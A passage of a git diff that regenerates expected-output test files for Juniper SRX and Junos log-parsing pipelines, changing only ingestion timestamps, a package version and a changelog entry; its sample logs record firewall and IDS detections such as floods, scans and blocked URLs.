packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", "kind": "alert", "start": "2020-03-02T23:13:03.193Z", 
@@ -240,7 +240,7 @@ "event": { "duration": 0, "severity": 165, - "ingested": "2021-12-09T13:40:03.197210Z", + "ingested": "2021-12-14T14:47:24.701238566Z", "original": "\u003c165\u003e1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"67.43.156.14\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"CRITICAL\" attack-name=\"TCP:C2S:AMBIG:C2S-SYN-DATA\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", "kind": "alert", "start": "2020-03-02T23:13:03.197Z", 
@@ -360,7 +360,7 @@ "event": { "duration": 0, "severity": 165, - "ingested": "2021-12-09T13:40:03.197213600Z", + "ingested": "2021-12-14T14:47:24.701239044Z", "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"67.43.156.14\" source-port=\"45610\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.19.13.11\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", "kind": "alert", "start": "2007-02-15T09:17:15.719Z", 
@@ -480,7 +480,7 @@ "event": { "duration": 0, "severity": 165, - "ingested": "2021-12-09T13:40:03.197218Z", + "ingested": "2021-12-14T14:47:24.701239455Z", "original": "\u003c165\u003e1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"67.43.156.14\" source-port=\"45610\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.16.1.10\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", "kind": "alert", "start": "2017-10-12T21:55:55.792Z", @@ -555,7 +555,7 @@ }, "event": { "severity": 165, - "ingested": "2021-12-09T13:40:03.197223300Z", + "ingested": "2021-12-14T14:47:24.701239828Z", "original": "\u003c165\u003e1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@67.43.156.15 epoch-time=\"1319367986\" ddos-application-name=\"Webserver\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" rulebase-name=\"DDOS\" policy-name=\"A DoS-Webserver\" repeat-count=\"0\" message=\"Connection rate exceeded limit 60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", 
@@ -651,7 +651,7 @@ }, "event": { "severity": 165, - "ingested": "2021-12-09T13:40:03.197228800Z", + "ingested": "2021-12-14T14:47:24.701240203Z", "original": "\u003c165\u003e1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@67.43.156.15 epoch-time=\"1319419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth1.O\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", 
@@ -747,7 +747,7 @@ }, "event": { "severity": 165, - "ingested": "2021-12-09T13:40:03.197234200Z", + "ingested": "2021-12-14T14:47:24.701240566Z", "original": "\u003c165\u003e1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@67.43.156.15 epoch-time=\"1419419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth3.0\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.1\" destination-address=\"172.30.20.201\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS02\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json index c97c7b662c6..6c8e5a531ed 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json @@ -79,7 +79,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302494600Z", + "ingested": "2021-12-14T14:47:28.277269090Z", "original": "\u003c11\u003e1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"TCP sweep!\" source-address=\"67.43.156.13\" source-port=\"6000\" destination-address=\"67.43.156.14\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", "kind": "alert", "action": "sweep_detected", 
@@ -167,7 +167,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302518100Z", + "ingested": "2021-12-14T14:47:28.277272744Z", "original": "\u003c11\u003e1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"WinNuke attack!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" source-port=\"3240\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-port=\"139\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", "kind": "alert", "action": "attack_detected", @@ -261,7 +261,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302526500Z", + "ingested": "2021-12-14T14:47:28.277273490Z", "original": "\u003c11\u003e1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"SYN flood!\" source-address=\"67.43.156.15\" source-port=\"40001\" destination-address=67.43.156.15\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "flood_detected", @@ -355,7 +355,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302615700Z", + "ingested": "2021-12-14T14:47:28.277274175Z", "original": "\u003c11\u003e1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@67.43.156.15 attack-name=\"UDP flood!\" source-address=\"67.43.156.15\" source-port=\"40001\" destination-address=\"67.43.156.15\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "flood_detected", 
@@ -445,7 +445,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302620100Z", + "ingested": "2021-12-14T14:47:28.277274871Z", "original": "\u003c11\u003e1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@67.43.156.15 attack-name=\"ICMP fragment!\" source-address=\"67.43.156.15\" destination-address=\"67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "fragment_detected", @@ -538,7 +538,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302625500Z", + "ingested": "2021-12-14T14:47:28.277275626Z", "original": "\u003c11\u003e1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Record Route IP option!\" source-address=\"67.43.156.15\" destination-address=\"67.43.156.15\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "category": [ @@ -624,7 +624,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302630400Z", + "ingested": "2021-12-14T14:47:28.277276220Z", "original": "\u003c11\u003e1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Tunnel GRE 6in6!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "tunneling_screen", 
@@ -718,7 +718,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302638100Z", + "ingested": "2021-12-14T14:47:28.277276939Z", "original": "\u003c11\u003e1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Tunnel GRE 4in4!\" source-address=\"67.43.156.13\" destination-address=\"67.43.156.15\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "tunneling_screen", @@ -787,7 +787,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302642100Z", + "ingested": "2021-12-14T14:47:28.277277582Z", "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@67.43.156.15 attack-name=\"SYN flood!\" destination-address=67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", "kind": "alert", "action": "flood_detected", @@ -859,7 +859,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302646100Z", + "ingested": "2021-12-14T14:47:28.277278242Z", "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@67.43.156.15 attack-name=\"SYN flood!\" source-address=\"67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", "kind": "alert", "action": "flood_detected", @@ -933,7 +933,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302650400Z", + "ingested": "2021-12-14T14:47:28.277278908Z", "original": "\u003c11\u003e1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"TCP port scan!\" source-address=\"10.1.1.100\" source-port=\"50630\" destination-address=\"10.1.1.1\" destination-port=\"10778\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "scan_detected", 
@@ -1004,7 +1004,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302656Z", + "ingested": "2021-12-14T14:47:28.277279898Z", "original": "\u003c11\u003e1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"FIN but no ACK bit!\" source-address=\"10.1.1.100\" source-port=\"42799\" destination-address=\"10.1.1.1\" destination-port=\"7\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "illegal_tcp_flag_detected", diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json index d3b6775b120..f5233973993 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json @@ -77,7 +77,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:14:13.629278700Z", + "ingested": "2021-12-14T14:47:32.388824965Z", "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"67.43.156.15\" source-port=\"1\" destination-address=\"10.10.0.10\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"]", "kind": "alert", "action": "malware_detected", 
@@ -178,7 +178,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:14:13.629290600Z", + "ingested": "2021-12-14T14:47:32.388827014Z", "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"67.43.156.15\" source-port=\"36612\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"]", "kind": "alert", "action": "malware_detected", diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json index 5f7fe473bb2..d83fd6e871a 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json @@ -75,7 +75,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639402800Z", + "ingested": "2021-12-14T14:47:33.324279966Z", "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "web_filter", 
@@ -165,7 +165,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639411600Z", + "ingested": "2021-12-14T14:47:33.324282137Z", "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-address=\"10.10.10.50\" source-port=\"1402\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"N/A\" reason=\"BY_OTHER\" profile=\"wf-profile\" url=\"www.checkpoint.com\" obj=\"/css/homepage2012.css\" username=\"user02\" roles=\"N/A\"]", "kind": "event", "category": [ @@ -251,7 +251,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639416300Z", + "ingested": "2021-12-14T14:47:33.324282547Z", "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@67.43.156.15 source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", "kind": "alert", "action": "virus_detected", @@ -331,7 +331,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639420Z", + "ingested": "2021-12-14T14:47:33.324282893Z", "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"]", "kind": "event", "category": [ 
@@ -394,7 +394,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639424500Z", + "ingested": "2021-12-14T14:47:33.324283231Z", "original": "\u003c12\u003e1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@67.43.156.15 source-address=\"10.2.1.101\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"51727\" filename=\"10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz\"]", "kind": "event", "category": [ @@ -455,7 +455,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:14:14.639523300Z", + "ingested": "2021-12-14T14:47:33.324283585Z", "original": "\u003c14\u003e1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-name=\"N/A\" source-address=\"10.10.10.1\" profile-name=\"antispam01\" action=\"drop\" reason=\"Match local blacklist\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "antispam_filter", @@ -542,7 +542,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:14:14.639531800Z", + "ingested": "2021-12-14T14:47:33.324283945Z", "original": "\u003c14\u003e1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@67.43.156.15 source-zone=\"untrust\" destination-zone=\"trust\" protocol=\"http\" source-address=\"192.168.2.3\" source-port=\"58071\" destination-address=\"192.168.100.2\" destination-port=\"80\" profile-name=\"content02\" action=\"drop\" reason=\"blocked due to file extension block list\" username=\"user01@testuser.com\" roles=\"N/A\" filename=\"test.cmd\"]", "kind": "alert", "action": "content_filter", 
@@ -633,7 +633,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639537600Z", + "ingested": "2021-12-14T14:47:33.324284279Z", "original": "\u003c12\u003e1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@67.43.156.15 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "web_filter", @@ -722,7 +722,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639541900Z", + "ingested": "2021-12-14T14:47:33.324284629Z", "original": "\u003c12\u003e1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@67.43.156.15 source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", "kind": "alert", "action": "virus_detected", @@ -814,7 +814,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:14:14.639547300Z", + "ingested": "2021-12-14T14:47:33.324285024Z", "original": "\u003c14\u003e1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"58974\" destination-address=\"67.43.156.14\" destination-port=\"443\" session-id=\"16297\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Information_Technology\" reason=\"BY_SITE_REPUTATION_MODERATELY_SAFE\" profile=\"WCF1\" url=\"datawrapper.dwcdn.net\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"0\"]", "risk_score": 0.0, "kind": "event", 
@@ -904,7 +904,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639552100Z", + "ingested": "2021-12-14T14:47:33.324285416Z", "original": "\u003c12\u003e1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"59075\" destination-address=\"67.43.156.13\" destination-port=\"443\" session-id=\"16490\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Advertisements\" reason=\"BY_SITE_REPUTATION_SUSPICIOUS\" profile=\"WCF1\" url=\"dsp.adfarm1.adition.com\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"3\"]", "risk_score": 3.0, "kind": "alert", @@ -993,7 +993,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639558300Z", + "ingested": "2021-12-14T14:47:33.324285896Z", "original": "\u003c12\u003e1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.100\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"]", "kind": "event", "category": [ diff --git a/packages/juniper/manifest.yml b/packages/juniper/manifest.yml index aeb4b4f0c3d..4bc71c38892 100644 --- a/packages/juniper/manifest.yml +++ b/packages/juniper/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: juniper title: Juniper Logs -version: 1.0.6 +version: 1.0.7 description: Deprecated. Use a specific Juniper package instead. categories: ["network", "security"] release: ga 
diff --git a/packages/juniper_junos/changelog.yml b/packages/juniper_junos/changelog.yml index 8b82f05b0bf..f745a9029fb 100644 --- a/packages/juniper_junos/changelog.yml +++ b/packages/juniper_junos/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.0.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.0.1" changes: - description: Initial release of new package split from oroginal Juniper package diff --git a/packages/juniper_junos/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json b/packages/juniper_junos/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json index 5bebbe50510..0bacf5bcc33 100644 --- a/packages/juniper_junos/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/juniper_junos/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json @@ -3,7 +3,7 @@ { "message": "Jan 29 06:09:59 ceroinBC.exe[6713]: RPD_SCHED_TASK_LONGRUNTIME: : exe ran for 7309(5049)", "event": { - "ingested": "2021-11-22T13:01:58.803536119Z" + "ingested": "2021-12-14T14:48:05.090706664Z" }, "ecs": { "version": "1.12.0" @@ -15,7 +15,7 @@ { "message": "Feb 12 13:12:33 DCD_FILTER_LIB_ERROR message repeated [7608]: llu: Filter library initialization failed", "event": { - "ingested": "2021-11-22T13:01:58.803552611Z" + "ingested": "2021-12-14T14:48:05.090709611Z" }, "ecs": { "version": "1.12.0" @@ -27,7 +27,7 @@ { "message": "Feb 26 20:15:08 MIB2D_TRAP_SEND_FAILURE: restart [6747]: sum: uaerat: cancel: success", "event": { - "ingested": "2021-11-22T13:01:58.803555368Z" + "ingested": "2021-12-14T14:48:05.090710155Z" }, "ecs": { "version": "1.12.0" 
@@ -39,7 +39,7 @@ { "message": "Mar 12 03:17:42 seq olorema6148.www.localdomain: fug5500.www.domain IFP trace\u003e node: dqu", "event": { - "ingested": "2021-11-22T13:01:58.803557763Z" + "ingested": "2021-12-14T14:48:05.090710581Z" }, "ecs": { "version": "1.12.0" @@ -51,7 +51,7 @@ { "message": "Mar 26 10:20:16 ssb SNMPD_CONTEXT_ERROR: [7400]: emq: isiu: success in 6237 context 5367", "event": { - "ingested": "2021-11-22T13:01:58.803560166Z" + "ingested": "2021-12-14T14:48:05.090710959Z" }, "ecs": { "version": "1.12.0" @@ -63,7 +63,7 @@ { "message": "Apr 9 17:22:51 RPD_KRT_IFL_CELL_RELAY_MODE_UNSPECIFIED: restart [7618]: ionul: ifl : nibus, unknown", "event": { - "ingested": "2021-11-22T13:01:58.803562516Z" + "ingested": "2021-12-14T14:48:05.090711366Z" }, "ecs": { "version": "1.12.0" @@ -75,7 +75,7 @@ { "message": "Apr 24 00:25:25 CHASSISD_SNMP_TRAP10 message repeated [1284]: ume: SNMP trap: failure: ono", "event": { - "ingested": "2021-11-22T13:01:58.803565Z" + "ingested": "2021-12-14T14:48:05.090711746Z" }, "ecs": { "version": "1.12.0" @@ -87,7 +87,7 @@ { "message": "May 8 07:27:59 sunt prehen6218.www.localhost: onse.exe[254]: RPD_KRT_IFL_CELL_RELAY_MODE_INVALID: : ifl : inibusBo, failure", "event": { - "ingested": "2021-11-22T13:01:58.803567406Z" + "ingested": "2021-12-14T14:48:05.090712147Z" }, "ecs": { "version": "1.12.0" @@ -99,7 +99,7 @@ { "message": "May 22 14:30:33 iamquis quirat6972.www5.lan: isc.exe[3237]: SNMPD_USER_ERROR: : conseq: unknown in 6404 user 'atiset' 4068", "event": { - "ingested": "2021-11-22T13:01:58.803569782Z" + "ingested": "2021-12-14T14:48:05.090712534Z" }, "ecs": { "version": "1.12.0" @@ -111,7 +111,7 @@ { "message": "Jun 5 21:33:08 fpc9 RPD_TASK_REINIT: [4621]: lita: Reinitializing", "event": { - "ingested": "2021-11-22T13:01:58.803572156Z" + "ingested": "2021-12-14T14:48:05.090712924Z" }, "ecs": { "version": "1.12.0" 
@@ -123,7 +123,7 @@ { "message": "Jun 20 04:35:42 fpc4 LOGIN_FAILED: [2227]: oinBC: Login failed for user quameius from host ipsumdol4488.api.localdomain", "event": { - "ingested": "2021-11-22T13:01:58.803574504Z" + "ingested": "2021-12-14T14:48:05.090713343Z" }, "ecs": { "version": "1.12.0" @@ -135,7 +135,7 @@ { "message": "Jul 4 11:38:16 NASD_PPP_SEND_PARTIAL: restart [3994]: aper: Unable to send all of message: santiumd", "event": { - "ingested": "2021-11-22T13:01:58.803577165Z" + "ingested": "2021-12-14T14:48:05.090713968Z" }, "ecs": { "version": "1.12.0" @@ -147,7 +147,7 @@ { "message": "Jul 18 18:40:50 UI_COMMIT_AT_FAILED message repeated [7440]: temqu: success, minimav", "event": { - "ingested": "2021-11-22T13:01:58.803579569Z" + "ingested": "2021-12-14T14:48:05.090714382Z" }, "ecs": { "version": "1.12.0" @@ -159,7 +159,7 @@ { "message": "Aug 2 01:43:25 rnatur ofdeFin7811.lan: emipsumd.exe[5020]: 